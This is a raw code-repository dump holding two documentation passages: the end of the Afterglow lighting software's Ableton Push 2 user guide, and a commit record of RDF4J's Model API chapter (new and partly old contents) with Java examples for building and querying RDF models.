left\nand right, to see and <<effect-control,adjust>> all of the currently\nrunning effects, even though only four at a time (or three, if the\n<<metronome-control,metronome section>> is showing) fit in the\ndisplay.\n\nPressing the kbd:[Page <] scrolls the display left, showing you older\n(or lower priority) effects, and kbd:[> Page] scrolls to the right,\nshowing you newer and higher priority effects. Pressing these buttons\nwhile kbd:[Shift] is held will scroll as far as possible in the\ncorresponding direction. (As illustrated in the photo below, in\naddition to lighting up the kbd:[Page <] and kbd:[> Page] buttons when\nthere are effects off the screen in that direction, Afterglow draws\n`<` and `>` markers below the effect name labels at the corresponding\nedge of the screen.)\n\nimage::Push2Page.jpg[Push 2 page arrows]\n\n== Effect Control\n\nEffects, whether created by cues or other code, appear in the display\narea, and can be scrolled through and ended by pressing the\ncorresponding red kbd:[End] pad which appears underneath them. There\nare many ways you can interact with running effects:\n\n=== Numeric Cue Variables\n\nIf the effect was created by a cue that has numeric variables assigned\nto it, the variable names and values will appear above the effect\nname. The values can be adjusted using the encoder knob above the\nvariable. For example, in addition to varying the sparkle `chance`\nvariable using the pad pressure, as was done above, its `Fade`\nvariable can be adjusted using the effect variable encoder above it.\nAs soon as you touch the encoder knob associated with a variable, the\ngauge underneath its value brightens to indicate that you are\nadjusting it, and updates as you turn the encoder to change the value.\nIn the photo below, the `Confetti Dance` cue's `Min Last` variable is\nbeing adjusted.\n\nimage::AdjustingConfetti.jpg[Adjusting Min Last variable,693]\n\nAnd here is how the effect's display section updates while the value\nis being adjusted:\n\nimage::min-last.gif[Adjusting Min Last Animation]\n\nWhile you are adjusting the variable, the large touch strip on the\nleft hand side of the Push lights up to show you where you are in the\nvariable range, and you can touch and drag on the strip to instantly\nset the variable to another value.\n\nimage::AdjustingConfetti2.jpg[Adjusting and touch strip]\n\nMost numeric variables will have values that grow from the bottom of\nthe touch strip, but variables marked as `:centered` when created,\nlike Pan and Tilt, grow from the center up or down. (Their graphical\ngauges grow from the center as well.)\n\nimage::AdjustingCentered2.jpg[Adjusting centered cue variables]\n\nimage::pan-tilt.gif[Adjusting centered variable animation]\n\nIf an effect has only one adjustable variable, it will take up the\nentire effect area, and you can use either encoder to adjust it, as\nwhen adjusting a gobo shaking <<cues#creating-function-cues,function\ncue>> for the Torrent moving head spot:\n\nimage::AdjustingShake.jpg[Adjusting gobo shake cue]\n\nWhen you release the encoder knob, the adjustment graph returns to its\nnormal brightness, and the touch strip deactivates.\n\nThis photo also illustrates the dimming of incompatible cues discussed\n<<exclusivity,above>>: The leftmost columns of blue cues all establish\nsettings for the fixed gobo wheel of one of the Torrent moving-head\nspots. Since one of them is active (the `T1 atom shake` effect being\nadjusted corresponds to the bright blue button three rows down the\nsecond column), the others are dimmed to hint that pressing them would\nreplace the active cue.\n\nThis dimming can also be seen in the web interface view of the cue grid:\n\n[[gobo-photo]]\nimage::GoboCues.png[Gobo cues]\n\n=== Boolean Cue Variables\n\nIf a cue has Boolean variables assigned to it, they will also appear\nabove the effect name, with the current value showing as `Yes` or\n`No`. To adjust them you also start by grabbing the closest encoder.\nWith a Boolean value, the adjustment graph is always half full, and\nyou rotate it to the left for No, or right for Yes:\n\nimage::AdjustingDown2.jpg[Adjusting a Down? cue variable]\n\nNOTE: The `Blade Saw` cue in the photo is also an example of a cue\nthat defines a custom visualization. Underneath its variable gauges,\nit draws an animated view of the previous and upcoming measure of\ntime, with down beats marked in red as they are in the Metronome\nsection. The visualization is a strip chart showing the dimmer level\nthat the cue will establish at each point in time. As you adjust the\ncue variables, the visualization instantly updates to reflect your\nchanges, helping you understand how they affect it.\n\nimage::blade-saw.gif[Cue visualization animation]\n\nYou can also use the touch strip when setting a Boolean variable;\ntouching the top half sets it to `Yes`, while the bottom half sets it to\n`No`.\n\nimage::AdjustingDown2Strip.jpg[Adjusting a Down? cue with the touch strip visible]\n\nNOTE: The `Rainbow Pulse` cue to the left of the one being adjusted is\nan example of a cue with no variables to adjust.\n\n=== Color Cue Variables\n\nIf a cue has color variables assigned to it, they will also appear\nabove the effect name. The currently assigned color value will be\ndisplayed as swatch and a six digit hexadecimal number, representing\nthe eight bit red, green, and blue representation of the color value,\n#rrggbb. In this photo, a `Color all` cue with a color variable that\nstarts out white has just been launched:\n\nimage::ColorParam2.jpg[Cue with color variable]\n\nWhen an effect is displaying a color cue variable, the gauges beneath\nit represent hue and saturation values. (If the cue has only one\nvariable, both of these will always be visible. Otherwise, only the\none underneath the variable's encoder will be visible until you start\nadjusting that variable, at which point the other color gauge will\nappear.)\n\nTouching the associated encoder will open up a special color selection\ninterface, which takes over the entire cue grid, as well as the effect\ncell:\n\nimage::ColorPalette2.jpg[Color adjustment palette]\n\nIn addition to adjusting the color's hue and saturation using the\nencoders above the effect, you can instantly jump to a color by\ntapping any of the pads in the grid, which form a palette of four\nsaturation levels of hues spread across the rainbow. The four pads on\nthe bottom right let you select white, medium gray, and black as color\nvalues as well, and the last pad displays a preview of the currently\nselected color, rather than doing anything when you press it.\n\nIf any pad other than the preview pad matches the currently selected\ncolor, it blinks (regardless of whether you chose that color by\npressing the pad or by turning the encoders).\n\nWhile you are holding the hue or saturation encoder, you can also use\nthe touch strip to see and jump to any value in that encoder's range.\nIf both encoders are being held, the touch pad allows you to select\nsaturations, since the touch pads already give you an easy interface\nfor selecting hues.\n\nimage::color-all.gif[Color selection animation]\n\nAs soon as you let go of both the hue and saturation encoders, the\npalette disappears and the normal cue grid returns.\n\n=== Scrolling Through Cue Variables\n\nIf a cue has more than two variables, even though you can only see two\nat a time on the Push, you can still check and adjust all of them.\nWhenever there are too many to fit, the rightmost pad just below the\neffect display will be lit white and labeled kbd:[Next Vars >] as shown below:\n\nimage::MoreVars2.jpg[More than Two Cue Variables]\n\nIn the photo, the `Torrent Sine` and `Blade Triangle` cues have more\nvariables than are being displayed, while the `Color all` cue does\nnot.\n\nEach time you press a kbd:[Next Vars >] button, you will see the next\ntwo variables assigned to the cue. Once you reach the end of the list,\nit wraps back to the beginning. Grabbing an encoder above the\nvariables will adjust whichever variable is currently displayed\nbeneath it. (While you are holding encoders to adjust an effect's\nvariables, its kbd:[Next Vars >] button will be blacked out and\ndisabled.)\n\n=== Saving Cues\n\nIf you have made any adjustments to cue variable values, these are\nnormally discarded when you end the cue; the next time it begins, it\nstarts with the values that were configured in the show. You can\nchange that by saving the cue's variables. To begin, hold down the\nkbd:[◯] button near the bottom left of the Push 2:\n\nimage::Saving2.jpg[Saving Cue Variables]\n\nWhile this button is held down, the red kbd:[End] buttons beneath the\neffect list disappear, and are replaced with the cue saving interface.\nIf you have made any adjustments to a cue's variables since it was\nstarted, a green kbd:[Save] button will appear (like the one beneath\nthe `Color all` effect in the photo above). Pressing that will save\nthe adjustments you made, so the next time you launch the cue, the\nadjusted values will be used.\n\nWhen you save a color cue that is configured like the ones in the\nsample show, the color of the cue's pad in the cue grid is updated to\nreflect the new color you have chosen. (Its color in the the web\ninterface cue grid is updated as well).\n\nOnce you have saved a cue's variables, while it is running, instead of\na green kbd:[Save] button, you will see an amber kbd:[Clear] button\n(like the one beneath the `Torrent Sine` effect in the photo).\nPressing that will remove the saved values, so the cue goes back to\nits original configuration.\n\nIf you save a cue's variables, and then adjust them further, the\nkbd:[Save] button returns, allowing you to save your new values. If\nyou don't, the values you saved earlier will be used the next time you\nstart the cue.\n\nIf a cue's variables have neither been saved nor adjusted, no\nkbd:[Save] or kbd:[Update] button appears (like for the `Blade\nTriangle` effect in the photo). Of course, while saving cues, you can\nstill scroll though their variables using the kbd:[Next Vars >]\nbuttons.\n\nOnce you release the kbd:[◯] button, the save interface goes\naway, and the effect kbd:[End] buttons return.\n\nimage::save-clear.gif[Save interface animation]\n\n== Metronome Control\n\nThe top left section of the Push lets you view and adjust the\nMetronome that the show is using to keep time with the music that is\nbeing played. Since Afterglow's effects are generally defined with\nrespect to the metronome, it is important to keep it synchronized with\nthe music. When active, the metronome section takes over the leftmost\nquarter of the graphical display (so there are room to see only three\neffects, rather than the normal four). To toggle the metronome\nsection, press the kbd:[Metronome] button. It will appear if it was\nnot showing, and disappear if it was there. The kbd:[Metronome] button\nis lit more brightly when the section is active.\n\nThe metronome section shows the current speed, in Beats Per Minute, of\nthe metronome, and the kbd:[Tap Tempo] button label flashes at each beat\n(this flashing happens regardless of whether the metronome section is\nvisible in the text area). The metronome section also shows you the\ncurrent phrase number, the bar within that phrase, and the beat within\nthat bar which has been reached.\n\nimage::Metronome2.png[Metronome section]\n\nFinally, below the beat and BPM displays, there is a visualization of\nthe passing beats, bars, and phrases. The beats are drawn in white,\nwith their phase increasing until the next beat hits. In a layer\nbeneath them, the measures (bars) are drawn in red, and beneath those,\nthe phrases in blue. The current moment in time is centered in the\nvisualization with a stationary line to mark it, and there is room for\none measure before and after the line. A full phrase doesn't fit, but\nyou can see its phase gradually growing until it ends.\n\nimage::metronome-phrase.gif[One phrase of metronome animation]\n\nThe most basic way of synchronizing the metronome is to tap the\nkbd:[Tap Tempo] button at each beat of the music. Tapping the button\naligns the metronome to a beat, and if you tap it three or more times\nwithin two seconds of each preceding tap, sets the metronome's BPM.\nTap it as you hear each beat of the music, and after three or more\ntaps, the speed of the metronome will be approximately synchronized\nwith the music.\n\nOnce the tempo is correct, you can tell Afterglow which beat is the\ndown beat by holding down the kbd:[Shift] button while pressing\nkbd:[Tap Tempo]. This combination does not change the tempo, but tells\nAfterglow that the moment when you tapped the button is the down beat\n(the first beat of a bar).\n\nYou can also adjust the BPM by turning the BPM encoder, which is the\nencoder right above the kbd:[Metronome] button:\n\nimage::Push2BPM.jpg[BPM encoder]\n\nWhile you are holding this encoder, the BPM gauge brightens, along\nwith the BPM digit after the decimal point, as a visual reminder of\nwhat value you are adjusting. Turning the encoder clockwise raises the\nBPM, turning counterclockwise lowers it. While the metronome section\nis showing, you can also use the encoder above the BPM value to adjust\nit. But you can grab the dedicated BPM encoder above the\nkbd:[Metronome] button even when the metronome section is not showing,\nand it will appear while you have the encoder in your hand, so you can\nadjust the BPM quickly, and then get back to what you were doing.\n\nIf you press the kbd:[Shift] button, the BPM encoder can be used to\nadjust the BPM by whole beats rather than tenths. While kbd:[Shift] is\ndown, the BPM value before the decimal point will be brightened,\nrather than the digit after it, and the BPM will change ten times as\nquickly when you turn it. You can switch back and forth in the middle\nof your adjustments by pressing and releasing the shift key at any\ntime.\n\nimage::bpm-adjustment.gif[BPM adjustment animation]\n\nIn order to make longer chases and effects line up properly with the\nmusic, you will also want to make sure the count is right, that the\nbeat number shows `1` on the down beat, and that the bar numbers are\nright as well, so that the start of a phrase is reflected as bar\nnumber `1`. In addition to using kbd:[Shift] with kbd:[Tap Tempo] to\nset the down beat, you can adjust the current beat number using the\nbeat encoder, the encoder above the kbd:[Tap Tempo] button:\n\nimage::Push2Beat.jpg[Beat encoder]\n\nWhile you are holding this encoder, an endless circular gauge appears\nbelow the beat information, and the beat number is brightened, as a\nvisual reminder of what value you are adjusting. Turning the encoder\nclockwise jumps to the next beat, turning counterclockwise jumps back\nto the previous one. As a tactile reminder that you are adjusting\nwhole beats, this encoder moves with a distinct click as it changes\nvalue, while the BPM encoder turns smoothly as you scroll through\nfractional BPM values.\n\nWhile the metronome section is showing, you can also use the encoder\nabove the Beat value to adjust it. But you can grab the dedicated Beat\nencoder above the kbd:[Tap Tempo] button even when the metronome\nsection is not showing, and it will appear while you have the encoder\nin your hand, so you can adjust the beat number quickly, and then get\nback to what you were doing.\n\nIf you press the kbd:[Shift] button, the Beat encoder can be used to\nadjust the current bar within the phrase instead of the current beat.\nWhile kbd:[Shift] is down, the bar will be brightened instead of the\nbeat, and turning the encoder will jump that value forwards or\nbackwards:\n\nimage::beat-adjustment.gif[Beat adjustment animation]\n\nIf you know a phrase is about to begin, you can press the red\nkbd:[Reset] button in the metronome section right as it does. This\nwill reset the count to Phrase 1, Bar 1, Beat 1.\n\nTrying to keep up with tempo changes during dynamic shows can be\ntedious, so you will hopefully be able to take advantage of\nAfterglow's metronome synchronization features. If the DJ can send you\n<<mapping_sync#syncing-to-midi-clock,MIDI clock pulses>>, or you can\nconnect via a Local Area Network to Pioneer professional DJ gear to\nlock into the beat grid established by\n<<mapping_sync#syncing-to-pro-dj-link,Pro DJ Link>>, Afterglow can\nkeep the BPM (with MIDI) and even the beats (with Pro DJ Link and the\nTraktor Afterglow Beat Phase\n<<mapping_sync#syncing-to-traktor-beat-phase,controller mapping>>)\nsynchronized for you. The Sync button in the Metronome section\n(showing kbd:[Manual] sync in these photos) will eventually allow you to\nset this up, but that is not yet implemented, so for now you will need\nto use the <<README#metronome-control,web interface>> to configure it.\n\nNOTE: The button does already change color to let you know the sync\nstatus: amber means manual, green means successful automatic sync, and\nred means a requested automatic sync has failed. It is likely that a\nfuture release of Afterglow will let you press this button to choose\nyour sync source.\n\nOnce your sync is established, the meaning of the kbd:[Tap Tempo]\nbutton changes. If you are using MIDI clock to sync the BPM, it\nbecomes a kbd:[Tap Beat] button, which simply establishes where the\nbeat falls. If you are locked in to a Pro DJ Link beat grid or using\nthe Traktor beat phase mapping, the beats are automatically aligned\nfor you so, it becomes a kbd:[Tap Bar] button which, when pressed,\nindicates that the current beat is the down beat (start) of a bar.\n(Similarly, if you press the metronome kbd:[Reset] pad while synced to\na Pro DJ Link beat grid or Traktor beat phase, the beat itself will\nnot move, but the beat closest to when you pressed the pad will be\nidentified as Beat 1.) In these sync modes you can also use the\nkbd:[Shift] button to align at the next bigger boundary: If tapping\nwould normally move the bar, shift-tapping will move the phrase.\n\nIf you try to adjust the BPM encoder while sync is active, it will\nhave no effect, and Afterglow will point at the sync mode to explain\nwhy it is ignoring your adjustments.\n\n=== Sharing the Push 2\n\nIf you are using Afterglow at the same time as Ableton Live, you can\nswitch back and forth between which has control of the Push by\npressing the kbd:[User] button. If Live is not running when you press\nkbd:[User], the Push interface will simply go blank (except for the\nkbd:[User] button itself), until you press it again, at which point\nAfterglow will light it up.\n\nNOTE: Future releases will take advantage of more of the buttons on\nthe controller.\n\n==== License\n\n+++<a href=\"http:\/\/deepsymmetry.org\"><img src=\"assets\/DS-logo-bw-200-padded-left.png\" align=\"right\" alt=\"Deep Symmetry logo\"><\/a>+++\nCopyright \u00a9 2015-2018 http:\/\/deepsymmetry.org[Deep Symmetry, LLC]\n\nDistributed under the\nhttp:\/\/opensource.org\/licenses\/eclipse-1.0.php[Eclipse Public License\n1.0], the same as Clojure. By using this software in any fashion, you\nare agreeing to be bound by the terms of this license. You must not\nremove this notice, or any other, from this software. A copy of the\nlicense can be found in\nhttps:\/\/deepsymmetry.org\/afterglow\/resources\/public\/epl-v10.html[resources\/public\/epl-v10.html]\nwithin this project.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7be74e3c2d911ce8738eb646568b4c3cead7eee5","subject":"Fix typo {javdoc} to {javadoc}","message":"Fix typo {javdoc} to {javadoc}","repos":"eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j","old_file":"doc\/programming\/02-model-api.adoc","new_file":"doc\/programming\/02-model-api.adoc","new_contents":"= The RDF Model API\n\nThe RDF Model API is the core of the RDF4J framework. It provides the basic building blocks for manipulating RDF data in Java. In this chapter, we introduce these basic building blocks and show some example on hot to use them.\n\n== RDF Building Blocks: IRIs, literals, blank nodes and statements\n\nThe core of the RDF4J framework is the RDF Model API (see the link:\/javadoc\/latest\/?org\/eclipse\/rdf4j\/model\/package-summary.html[Model API Javadoc]), defined in package `org.eclipse.rdf4j.model`. This API defines how the building blocks of RDF (statements, IRIs, blank nodes, literals, and models) are represented.\n\nRDF statements are represented by the {javadoc}model\/Statement.html[Statement] interface. Each `Statement` has a subject, predicate, object and (optionally) a context (more about contexts below, in the section about the Repository API). Each of these 4 items is a {javadoc}model\/Value.html[Value]. The `Value` interface is further specialized into {javadoc}model\/Resource.html[Resource], and {javadoc}model\/Literal.html.html[Literal]. `Resource` represents any RDF value that is either a blank node or a IRI (in fact, it specializes further into {javadoc}model\/IRI.html[IRI] and {javadoc}model\/BNode.html[BNode]). `Literal`\nrepresents RDF literal values (strings, dates, integer numbers, and so on).\n\nTo create new values and statements, we can use a {javadoc}model\/ValueFactory.html[ValueFactory]. You can use a default ValueFactory implementation called {javadoc}model\/impl\/SimpleValueFactory[SimpleValueFactory]:\n\n[source,java]\n----\nimport org.eclipse.rdf4j.model.ValueFactory;\nimport org.eclipse.rdf4j.model.impl.SimpleValueFactory;\n\nValueFactory factory = SimpleValueFactory.getInstance();\n----\n\nYou can also obtain a `ValueFactory` from the {javadoc}repository\/Repository.html[Repository] you are working with, and in fact, this is the recommend approach. More about that in the next section.\n\nRegardless of how you obtain your `ValueFactory`, once you have it, you can use it to create new URIs, Literals, and Statements:\n\n[source,java]\n----\nIRI bob = factory.createIRI(\"http:\/\/example.org\/bob\");\nIRI name = factory.createIRI(\"http:\/\/example.org\/name\");\nLiteral bobsName = factory.createLiteral(\"Bob\");\nStatement nameStatement = factory.createStatement(bob, name, bobsName);\n----\n\nThe Model API also provides pre-defined IRIs for several well-known vocabularies, such as RDF, RDFS, OWL, DC (Dublin Core), FOAF (Friend-of-a-Friend), and more. These constants can all be found in the {javadoc}model\/vocabulary\/package-summary.html[org.eclipse.rdf4j.model.vocabulary] package, and can be quite handy in quick creation of RDF statements (or in querying a Repository, as we shall see later):\n\n[source,java]\n----\nStatement typeStatement = factory.createStatement(bob, RDF.TYPE, FOAF.PERSON);\n----\n\n== The Model interface\n\nThe above interfaces and classes show how we can create the individual building blocks that make up an RDF model. However, an actual collection of RDF data is just that: a collection. In order to deal with collections of RDF statements, we can use the {javadoc}model\/Model[org.eclipse.rdf4j.model.Model] interface.\n\n`Model` is an extension of the default Java Collection class `java.util.Set<Statement>`. This means that you can use a `Model` like any other Java collection in your code: \n\n[source,java]\n----\n\/\/ create a new Model to put statements in\nModel model = new LinkedHashModel(); \n\/\/ add an RDF statement\nmodel.add(typeStatement);\n\/\/ add another RDF statement by simply providing subject, predicate, and object.\nmodel.add(bob, name, bobsName);\n \n\/\/ iterate over every statement in the Model\nfor (Statement statement: model) {\n\t ...\n}\n----\n\nIn addition, however, `Model` offers a number of useful methods to quickly get subsets of statements and otherwise search\/filter your collection of statements. For example, to quickly iterate over all statements that make a resource an instance of the class `foaf:Person`, you can do:\n\n[source,java]\n----\nfor (Statement typeStatement: model.filter(null, RDF.TYPE, FOAF.PERSON)) {\n \/\/ ...\n}\n----\n\nEven more convenient is that you can quickly retrieve the building blocks that make up the statements. For example, to immediately iterate over all subject-resources that are of type `foaf:Person` and then retrieve each person\u2019s name, you can do something like the following:\n\n[source,java]\n----\nfor (Resource person: model.filter(null, RDF.TYPE, FOAF.PERSON).subjects()) {\n \/\/ get the name of the person (if it exists)\n Optional<Literal> name = Models.objectLiteral(model.filter(person, FOAF.NAME, null)); \n}\n----\n\nThe `filter()` method returns a `Model` again. However, the `Model` returned by this method is still backed by the original `Model`. Thus, changes that you make to this returned `Model` will automatically be reflected in the original `Model` as well.\n\nRDF4J provides two default implementations of the `Model` interface: {javadoc}model\/impl\/LinkedHashModel.html[org.eclipse.rdf4j.model.impl.LinkedHashModel], and {javadoc}model\/impl\/TreeModel.html[org.eclipse.rdf4j.model.impl.TreeModel]. The difference between the two is in their performance for different kinds of lookups and insertion patterns (see their respective javadoc entries for details). These differences are only really noticable when dealing with quite large collections of statements, however. \n\n== Building RDF Models with the ModelBuilder\n\nSince version 2.1, RDF4J provides a {javadoc}model\/util\/ModelBuiler.html[ModelBuilder] utility. The ModelBuilder provides a fluent API to quickly and efficiently create RDF models programmatically.\n\nHere\u2019s a simple code example that demonstrates how to quickly create an RDF graph with some FOAF data:\n\n[source,java]\n----\nModelBuilder builder = new ModelBuilder();\n \n\/\/ set some namespaces \nbuilder.setNamespace(\"ex\", \"http:\/\/example.org\/\").setNamespace(FOAF.NS);\n\nbuilder.namedGraph(\"ex:graph1\") \/\/ add a new named graph to the model\n .subject(\"ex:john\") \/\/ add several statements about resource ex:john \n\t .add(FOAF.NAME, \"John\") \/\/ add the triple (ex:john, foaf:name \"John\") to the named graph\n\t .add(FOAF.AGE, 42)\n\t .add(FOAF.MBOX, \"john@example.org\");\n\n\/\/ add a triple to the default graph\nbuilder.defaultGraph().add(\"ex:graph1\", RDF.TYPE, \"ex:Graph\");\n\n\/\/ return the Model object\nModel m = builder.build();\n----\n\nThe ModelBuilder offers several conveniences:\n\n - you can specify a subject\/predicate IRI as a prefixed name string (for example \u201cex:john\u201d), so you don\u2019t have to use a ValueFactory to create an IRI object first.\n - you can add a literal object as a String, an int, or several other supported Java primitive types.\n - the subject() method make it easier to take a resource-centric view when building an RDF Model.\n\n== RDF Collections\n\nTo model closed lists of items, RDF provides a Collection vocabulary . RDF Collections are represented as a list of items using a Lisp-like structure. The list starts with a head resource (typically a blank node), which is connected to the first collection member via the rdf:first relation. The head resource is then connected to the rest of the list via an rdf:rest relation. The last resource in the list is marked using the rdf:nil node.\n\nAs an example, a list containing three values, \u201cA\u201d, \u201cB\u201d, and \u201cC\u201d looks like this as an RDF Collection:\n\n[[img-collection]]\nimage::rdf-collection.svg[title=\"An RDF Collection containing three items\"]\n\nHere, the blank node `_:n1` is the head resource of the list. In this example it is declared an instance of rdf:List, however this is not required for the collection to be considered well-formed. For each collection member, a new node is added (linked to the previous node via the `rdf:rest` property), and the actual member value is linked to to this node via the `rdf:first` property. The last member member of the list is marked by the fact that the value of its `rdf:rest` property is set to `rdf:ni`l.\n\nWorking with this kind of structure directly is rather cumbersome. To make life a little easier, the RDF4J API provide several utilities to convert between Java Collections and RDF Collections.\n\n=== Converting to\/from Java Collections\n\nAs an example, suppose we wish to add the above list of three string literals as a property value for the property `ex:favoriteLetters` of `ex:John` .\n\nThe {javadoc}model\/util\/RDFCollections.html[RDFCollections] utility allows us to do this, as follows:\n\n[source,java]\n----\nString ns = \"http:\/\/example.org\/\";\nValueFactory vf = SimpleValueFactory.getInstance(); \n\/\/ IRI for ex:favoriteLetters \nIRI favoriteLetters = vf.createIRI(ns, \"favoriteLetters\"); \n\/\/ IRI for ex:John \nIRI john = vf.createIRI(ns, \"John\"); \n\/\/ create a list of letters \nList<Literal> letters = Arrays.asList(new Literal[] { vf.createLiteral(\"A\"), vf.createLiteral(\"B\"), vf.createLiteral(\"C\") }); \n\/\/ create a head resource for our list \nResource head = vf.createBNode(); \n\/\/ convert our list and add it to a newly-created Model \nModel aboutJohn = RDFCollections.asRDF(letters, head, new LinkedHashModel()); \n\/\/ set the ex:favoriteLetters property to link to the head of the list\naboutJohn.add(john, favoriteLetters, head);\n----\n\nOf course, we can also convert back:\n\n[source,java]\n----\nModel aboutJohn = ... ; \/\/ our Model about John\n\/\/ get the value of the ex:favoriteLetters property \nResource node = Models.objectResource(aboutJohn.filter(john, favoriteLetters, null)).orElse(null); \n\/\/ Convert its collection back to an ArrayList of values\nif(node != null) { \n\t List<Value> values = RDFCollections.asValues(aboutJohn, node, new ArrayList<Value>()); \n\t \/\/ you may need to cast back to Literal. \n\t Literal a = (Literal)values.get(0); \n}\n----\n\n=== Extracting, copying, or deleting an RDF Collection\n\nTo extract an RDF Collection from the model which contains it, we can do the following:\n\n[source,java]\n----\nModel aboutJohn = ...; \/\/ our model\n\/\/ get the value of the ex:favoriteLetters property \nResource node = Models.objectResource(aboutJohn.filter(john, favoriteLetters, null)).orElse(null); \n\/\/ get the RDF Collection in a separate model\nif (node != null) { \n\t Model rdfList = RDFCollections.getCollection(aboutJohn, node, new LinkedHashModel()); \n}\n----\n\nAs you can see, instead of converting the RDF Collection to a Java List of values, we get back another Model object from this, containing a copy of the RDF statements that together form the RDF Collection. This is useful in cases where your original Model contains more data than just the RDF Collection, and you want to isolate the collection.\n\nOnce you have this copy of your Collection, you can use it to add it somewhere else, or to remove the collection from your Model:\n\n[source,java]\n----\n\/\/ remove the collection from our model about John \naboutJohn.removeAll(rdfList); \n\/\/ finally remove the triple that linked John to the collection \naboutJohn.remove(john, favoriteLetters, node);\n----\n\nActually, deleting can be done more efficiently than this. Rather than first creating a completely new copy of the RDF Collection only to then delete it, we can use a streaming approach instead:\n\n[source,java]\n----\n\/\/ extract the collection from our model in streaming fashion and remove each statement from the model \nRDFCollections.extract(aboutJohn, node, st -> aboutJohn.remove(st)); \n\/\/ remove the statement that linked john to the collection \naboutJohn.remove(john, favoriteLetters, node);\n----\n","old_contents":"= The RDF Model API\n\nThe RDF Model API is the core of the RDF4J framework. It provides the basic building blocks for manipulating RDF data in Java. In this chapter, we introduce these basic building blocks and show some example on hot to use them.\n\n== RDF Building Blocks: IRIs, literals, blank nodes and statements\n\nThe core of the RDF4J framework is the RDF Model API (see the link:\/javadoc\/latest\/?org\/eclipse\/rdf4j\/model\/package-summary.html[Model API Javadoc]), defined in package `org.eclipse.rdf4j.model`. This API defines how the building blocks of RDF (statements, IRIs, blank nodes, literals, and models) are represented.\n\nRDF statements are represented by the {javadoc}model\/Statement.html[Statement] interface. Each `Statement` has a subject, predicate, object and (optionally) a context (more about contexts below, in the section about the Repository API). Each of these 4 items is a {javadoc}model\/Value.html[Value]. The `Value` interface is further specialized into {javadoc}model\/Resource.html[Resource], and {javadoc}model\/Literal.html.html[Literal]. `Resource` represents any RDF value that is either a blank node or a IRI (in fact, it specializes further into {javadoc}model\/IRI.html[IRI] and {javadoc}model\/BNode.html[BNode]). `Literal`\nrepresents RDF literal values (strings, dates, integer numbers, and so on).\n\nTo create new values and statements, we can use a {javadoc}model\/ValueFactory.html[ValueFactory]. You can use a default ValueFactory implementation called {javadoc}model\/impl\/SimpleValueFactory[SimpleValueFactory]:\n\n[source,java]\n----\nimport org.eclipse.rdf4j.model.ValueFactory;\nimport org.eclipse.rdf4j.model.impl.SimpleValueFactory;\n\nValueFactory factory = SimpleValueFactory.getInstance();\n----\n\nYou can also obtain a `ValueFactory` from the {javadoc}repository\/Repository.html[Repository] you are working with, and in fact, this is the recommend approach. More about that in the next section.\n\nRegardless of how you obtain your `ValueFactory`, once you have it, you can use it to create new URIs, Literals, and Statements:\n\n[source,java]\n----\nIRI bob = factory.createIRI(\"http:\/\/example.org\/bob\");\nIRI name = factory.createIRI(\"http:\/\/example.org\/name\");\nLiteral bobsName = factory.createLiteral(\"Bob\");\nStatement nameStatement = factory.createStatement(bob, name, bobsName);\n----\n\nThe Model API also provides pre-defined IRIs for several well-known vocabularies, such as RDF, RDFS, OWL, DC (Dublin Core), FOAF (Friend-of-a-Friend), and more. These constants can all be found in the {javadoc}model\/vocabulary\/package-summary.html[org.eclipse.rdf4j.model.vocabulary] package, and can be quite handy in quick creation of RDF statements (or in querying a Repository, as we shall see later):\n\n[source,java]\n----\nStatement typeStatement = factory.createStatement(bob, RDF.TYPE, FOAF.PERSON);\n----\n\n== The Model interface\n\nThe above interfaces and classes show how we can create the individual building blocks that make up an RDF model. However, an actual collection of RDF data is just that: a collection. In order to deal with collections of RDF statements, we can use the {javadoc}model\/Model[org.eclipse.rdf4j.model.Model] interface.\n\n`Model` is an extension of the default Java Collection class `java.util.Set<Statement>`. This means that you can use a `Model` like any other Java collection in your code: \n\n[source,java]\n----\n\/\/ create a new Model to put statements in\nModel model = new LinkedHashModel(); \n\/\/ add an RDF statement\nmodel.add(typeStatement);\n\/\/ add another RDF statement by simply providing subject, predicate, and object.\nmodel.add(bob, name, bobsName);\n \n\/\/ iterate over every statement in the Model\nfor (Statement statement: model) {\n\t ...\n}\n----\n\nIn addition, however, `Model` offers a number of useful methods to quickly get subsets of statements and otherwise search\/filter your collection of statements. For example, to quickly iterate over all statements that make a resource an instance of the class `foaf:Person`, you can do:\n\n[source,java]\n----\nfor (Statement typeStatement: model.filter(null, RDF.TYPE, FOAF.PERSON)) {\n \/\/ ...\n}\n----\n\nEven more convenient is that you can quickly retrieve the building blocks that make up the statements. For example, to immediately iterate over all subject-resources that are of type `foaf:Person` and then retrieve each person\u2019s name, you can do something like the following:\n\n[source,java]\n----\nfor (Resource person: model.filter(null, RDF.TYPE, FOAF.PERSON).subjects()) {\n \/\/ get the name of the person (if it exists)\n Optional<Literal> name = Models.objectLiteral(model.filter(person, FOAF.NAME, null)); \n}\n----\n\nThe `filter()` method returns a `Model` again. However, the `Model` returned by this method is still backed by the original `Model`. Thus, changes that you make to this returned `Model` will automatically be reflected in the original `Model` as well.\n\nRDF4J provides two default implementations of the `Model` interface: {javdoc}model\/impl\/LinkedHashModel.html[org.eclipse.rdf4j.model.impl.LinkedHashModel], and {javadoc}model\/impl\/TreeModel.html[org.eclipse.rdf4j.model.impl.TreeModel]. The difference between the two is in their performance for different kinds of lookups and insertion patterns (see their respective javadoc entries for details). These differences are only really noticable when dealing with quite large collections of statements, however. \n\n== Building RDF Models with the ModelBuilder\n\nSince version 2.1, RDF4J provides a {javadoc}model\/util\/ModelBuiler.html[ModelBuilder] utility. The ModelBuilder provides a fluent API to quickly and efficiently create RDF models programmatically.\n\nHere\u2019s a simple code example that demonstrates how to quickly create an RDF graph with some FOAF data:\n\n[source,java]\n----\nModelBuilder builder = new ModelBuilder();\n \n\/\/ set some namespaces \nbuilder.setNamespace(\"ex\", \"http:\/\/example.org\/\").setNamespace(FOAF.NS);\n\nbuilder.namedGraph(\"ex:graph1\") \/\/ add a new named graph to the model\n .subject(\"ex:john\") \/\/ add several statements about resource ex:john \n\t .add(FOAF.NAME, \"John\") \/\/ add the triple (ex:john, foaf:name \"John\") to the named graph\n\t .add(FOAF.AGE, 42)\n\t .add(FOAF.MBOX, \"john@example.org\");\n\n\/\/ add a triple to the default graph\nbuilder.defaultGraph().add(\"ex:graph1\", RDF.TYPE, \"ex:Graph\");\n\n\/\/ return the Model object\nModel m = builder.build();\n----\n\nThe ModelBuilder offers several conveniences:\n\n - you can specify 